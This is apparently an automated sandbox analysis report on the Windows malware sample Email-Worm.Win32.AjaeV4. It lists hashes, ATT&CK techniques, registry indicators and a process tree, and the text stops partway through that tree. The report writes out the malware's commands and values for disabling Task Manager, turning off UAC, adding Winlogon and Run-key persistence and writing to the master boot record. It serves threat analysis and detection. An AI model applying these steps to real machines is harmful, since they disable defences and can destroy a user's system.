fc0b303599210c045b879b9d6ccc3328389ccd41e1eabbbdf1edb45d27213be0

Analysis

max time kernel
168s
max time network
182s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
28/03/2025, 01:03

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Email-Worm.Win32.AjaeV4.zip
Size

143KB
MD5

fb3cb8b2c21b7985e46861fec73931fd
SHA1

54390247dddd3fc6c7740f3c3159018fc3db92dd
SHA256

fc0b303599210c045b879b9d6ccc3328389ccd41e1eabbbdf1edb45d27213be0
SHA512

c928175d043a5c1be1d22a419ec22725b1d5c422d41d30ffee5168d043514254cf19c7f84b68959b13e755594e2e7871d3c447627152da803bf29a0f55e367c3
SSDEEP

3072:hwSVzHvumZ4gY7x1wc/Zf4GcHe4aJZm1Dzt68Yw2VBzdrP:hTvumsLZQhCsXH4dr

Score

10^/10

bootkit defense_evasion discovery execution exploit persistence privilege_escalation trojan

Malware Config

Signatures

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Windows\\System32\\sex.exe"	reg.exe

UAC bypass 3 TTPs 2 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
defense_evasion

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
6652	takeown.exe
7248	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 4 IoCs

pid	Process
2724	AjaeV4.exe
5996	sex.exe
6340	mbr.exe
4284	sex.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6652	takeown.exe
7248	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000\Software\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mbr.exe = "C:\\Windows\\N3OS3X3R\\mbr.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\player.vbs = "player.vbs"	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	mbr.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\	sex.exe
File opened for modification	C:\Windows\System32\ajae.txt	cmd.exe
File created	C:\Windows\System32\SwiftHackProtection.pdf.scr	cmd.exe
File created	C:\Windows\SysWOW64\	sex.exe
File opened for modification	C:\Windows\System32\ajae.txt	cmd.exe
File created	C:\Windows\System32\sex.exe	cmd.exe
File opened for modification	C:\Windows\System32\sex.exe	cmd.exe
File opened for modification	C:\Windows\System32\SwiftHackProtection.pdf.scr	cmd.exe
File created	C:\Windows\SysWOW64\rockmymbr.exe	sex.exe
File created	C:\Windows\SysWOW64\	sex.exe
File opened for modification	C:\Windows\SysWOW64\	sex.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\kn\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\it\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\vi\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\ne\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\service_worker_bin_prod.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\kk\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\lo\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\si\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\fil\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\iw\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\en_CA\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\is\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\sl\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\zu\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\gu\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1334111442\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\ka\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\sr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\bg\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\hu\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1894071455\protocols.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\page_embed_script.js	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\offscreendocument.html	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\bn\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\tr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\nl\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\sw\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\id\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1894071455\manifest.fingerprint	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\es_419\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\hr\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\et\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\en_US\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\hy\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\manifest.fingerprint	msedge.exe
File created	C:\Windows\SystemTemp\msedge_url_fetcher_432_468386810\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\pl\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\de\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\am\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\be\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\cy\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\ru\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1894071455\manifest.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\pt_PT\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\no\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\da\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\zh_CN\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\ar\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\pa\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_metadata\verified_contents.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1334111442\LICENSE	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\my\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\ur\messages.json	msedge.exe
File created	C:\Windows\N3OS3X3R\mbr.exe	cmd.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\zh_TW\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\ro\messages.json	msedge.exe
File opened for modification	C:\Windows\N3OS3X3R\ajaemsg.vbs	cmd.exe
File created	C:\Windows\N3OS3X3R\shp.scr	cmd.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\th\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\gl\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\el\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\az\messages.json	msedge.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_12540802\_locales\sk\messages.json	msedge.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2408	sc.exe
6664	sc.exe
6704	sc.exe
6648	sc.exe
8084	sc.exe
6180	sc.exe
6656	sc.exe
8108	sc.exe
6516	sc.exe
6224	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mbr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AjaeV4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sex.exe

Delays execution with timeout.exe 28 IoCs

defense_evasion

pid	Process
2376	timeout.exe
5340	timeout.exe
5408	timeout.exe
6316	timeout.exe
6960	timeout.exe
1928	timeout.exe
540	timeout.exe
1196	timeout.exe
540	timeout.exe
412	timeout.exe
196	timeout.exe
7016	timeout.exe
7644	timeout.exe
5060	timeout.exe
2456	timeout.exe
4836	timeout.exe
5968	timeout.exe
5968	timeout.exe
2812	timeout.exe
6624	timeout.exe
7052	timeout.exe
2016	timeout.exe
4736	timeout.exe
1672	timeout.exe
1340	timeout.exe
4412	timeout.exe
3392	timeout.exe
7736	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
7224	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133875975118220639"	msedge.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2873637269-1458872900-2373203793-1000\{EC3CE263-B587-4E6B-AD91-BCF02206EAA3}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

T1112

pid	Process
5940	reg.exe
2388	reg.exe
2992	reg.exe
6716	reg.exe
6748	reg.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
7004	NOTEPAD.EXE
5892	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 50 IoCs

pid	Process
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe
432	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeRestorePrivilege	4704	7zG.exe
Token: 35	4704	7zG.exe
Token: SeSecurityPrivilege	4704	7zG.exe
Token: SeSecurityPrivilege	4704	7zG.exe
Token: 33	1400	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1400	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4704	7zG.exe
432	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2724	AjaeV4.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 4784	2724	AjaeV4.exe	88
PID 2724 wrote to memory of 4784	2724	AjaeV4.exe	88
PID 4784 wrote to memory of 2088	4784	cmd.exe	90
PID 4784 wrote to memory of 2088	4784	cmd.exe	90
PID 4784 wrote to memory of 2200	4784	cmd.exe	91
PID 4784 wrote to memory of 2200	4784	cmd.exe	91
PID 4784 wrote to memory of 1928	4784	cmd.exe	92
PID 4784 wrote to memory of 1928	4784	cmd.exe	92
PID 4784 wrote to memory of 5060	4784	cmd.exe	93
PID 4784 wrote to memory of 5060	4784	cmd.exe	93
PID 4784 wrote to memory of 1500	4784	cmd.exe	94
PID 4784 wrote to memory of 1500	4784	cmd.exe	94
PID 4784 wrote to memory of 2016	4784	cmd.exe	95
PID 4784 wrote to memory of 2016	4784	cmd.exe	95
PID 1500 wrote to memory of 432	1500	msedge.exe	96
PID 1500 wrote to memory of 432	1500	msedge.exe	96
PID 432 wrote to memory of 240	432	msedge.exe	97
PID 432 wrote to memory of 240	432	msedge.exe	97
PID 432 wrote to memory of 3856	432	msedge.exe	98
PID 432 wrote to memory of 3856	432	msedge.exe	98
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99
PID 432 wrote to memory of 1728	432	msedge.exe	99

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4.zip
1⤵
PID:3248

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:3924

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3356

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\" -spe -an -ai#7zMap9612:126:7zEvent30525
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4704

C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\AjaeV4.exe
"C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\AjaeV4.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2769.tmp\276A.tmp\276B.bat C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\AjaeV4.exe"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 1
    3⤵
    PID:2088
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\ajae.txt
    3⤵
    PID:2200
- - C:\Windows\system32\timeout.exe
    timeout 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1928
- - C:\Windows\system32\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=what
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.google.co.ck/search?q=what
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:432
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ffbc315f208,0x7ffbc315f214,0x7ffbc315f220
        5⤵
        
        PID:240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1864,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:11
        5⤵
        
        PID:3856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2028,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:2
        5⤵
        
        PID:1728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2508,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:13
        5⤵
        
        PID:5568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3436,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:1
        5⤵
        
        PID:5744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
        5⤵
        
        PID:1016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3448,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=4824 /prefetch:1
        5⤵
        
        PID:2412
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4704,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5044 /prefetch:12
        5⤵
        
        PID:4316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4856,i,15314393902841452971,17565196047528404421,262144 --variations-seed-version --mojo-platform-channel-handle=5076 /prefetch:14
        5⤵
        
        PID:3160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
